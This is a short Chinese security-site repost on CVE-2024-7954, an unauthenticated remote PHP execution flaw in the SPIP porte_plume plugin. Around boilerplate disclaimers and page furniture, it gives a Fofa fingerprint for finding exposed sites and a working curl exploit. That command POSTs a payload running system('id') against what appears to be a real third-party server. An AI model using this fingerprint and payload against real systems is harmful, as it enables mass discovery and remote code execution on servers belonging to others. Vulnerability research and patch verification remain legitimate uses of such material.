SPIP插件porte_plume存在任意PHP执行漏洞(CVE-2024-7954)

admin 2024年8月28日22:50:30评论44 views字数 567阅读1分53秒阅读模式
免责声明
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

漏洞描述
SPIP 4.30-alpha2、4.2.13、4.1.16之前的版本使用的porte_plume插件存在任意代码执行漏洞,远程未经身份验证的攻击者可以通过发送精心设计的HTTP 请求以SPIP用户身份执行任意PHP代码。

资产测绘
Fofa:icon_hash=="-1224668706"

漏洞复现
fofa:icon_hash=="-1224668706"
curl -sSkiL 'https://test9.spip.webvaloris.fr/index.php?action=porte_plume_previsu' -X POST -d 'data=AA_[<img111111>->URL`<?php system("id");?>`]_BB'
SPIP插件porte_plume存在任意PHP执行漏洞(CVE-2024-7954)

原文始发于微信公众号(漏洞文库):【漏洞复现】SPIP插件porte_plume存在任意PHP执行漏洞(CVE-2024-7954)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月28日22:50:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SPIP插件porte_plume存在任意PHP执行漏洞(CVE-2024-7954)https://cn-sec.com/archives/3105212.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息